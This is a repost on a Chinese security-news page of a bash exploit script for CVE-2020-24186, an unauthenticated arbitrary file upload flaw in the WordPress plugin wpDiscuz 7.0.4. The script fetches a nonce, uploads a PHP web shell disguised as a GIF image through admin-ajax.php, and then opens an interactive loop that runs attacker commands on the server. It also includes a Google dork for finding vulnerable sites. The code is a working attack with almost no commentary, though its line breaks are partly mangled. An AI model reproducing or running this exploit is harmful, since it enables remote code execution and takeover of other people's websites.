WordPress 插件 wpDiscuz 7.0.4 – 任意文件上传漏洞 EXP
2021-06-09 10:52:48 Author: mp.weixin.qq.com(查看原文) 阅读量:155 收藏


文章来源:Khan安全攻防实验室

# Exploit Title: WordPress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)# Google Dork: inurl:/wp-content/plugins/wpdiscuz/# Date: 2021-06-06# Original Author: Chloe Chamberland # Exploit Author: Juampa Rodríguez aka UnD3sc0n0c1d0# Vendor Homepage: https://gvectors.com/# Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip# Version: 7.0.4# Tested on: Ubuntu / WordPress 5.6.2# CVE : CVE-2020-24186
#!/bin/bash
if [ -z $1 ]then  echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n"  exit 0elif [ -z $2 ]then  echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n"  exit 0else
post=$(curl -sI http://$1$2/ | head -n1)
if [[ "$post" == *"200 OK"* ]]; then    wmu_nonce=$(curl -s http://$1$2/ | sed -r "s/wmuSecurity/\nwmuSecurity/g" | grep wmuSecurity | cut -d '"' -f3)    webshell=$(curl -isk -X 'POST' -H 'X-Requested-With: XMLHttpRequest' -H 'Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundaryUnD3s' --data-binary $'-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0awmuUploadFiles\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_nonce\"\x0d\x0a\x0d\x0a'$wmu_nonce$'\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmuAttachmentsData\"\x0d\x0a\x0d\x0aundefined\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"a.php\" Content-Type: image/jpeg\x0d\x0a\x0d\x0aGIF8\x0d\x0a<?php\x0d\x0aif(isset($_REQUEST[\'cmd\'])){\x0d\x0a        $cmd = ($_REQUEST[\'cmd\']);\x0d\x0a        system($cmd);\x0d\x0a        die;\x0d\x0a}\x0d\x0a?>\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"postId\"\x0d\x0a\x0d\x0a18\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s--\x0d\x0a' http://$1/wp-admin/admin-ajax.php | sed 's/\":"\http/\nhttp/g' | grep "http\:\\\\/" | cut -d '"' -f1 | sed 's/\\//g')
    echo -e "\nWebshell:" $webshell"\n"    echo -e "--------------WIN--------------"    echo -e "        ¡Got  webshell!        "    echo -e "-------------------------------\n"    while :    do  read -p '$ ' command  curl -s $webshell?cmd=$command | grep -v GIF8doneelse    echo -e "\n[!] The indicated post was not found\n"fifi


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650514017&idx=3&sn=3554d6d9fbdcbd87db3bc1e85c490e3f&chksm=83bac785b4cd4e93253a1bd4de8c1f849750b473992954a0e742cd5c0d97303314aec95e6e6a#rd
如有侵权请联系:admin#unsafe.sh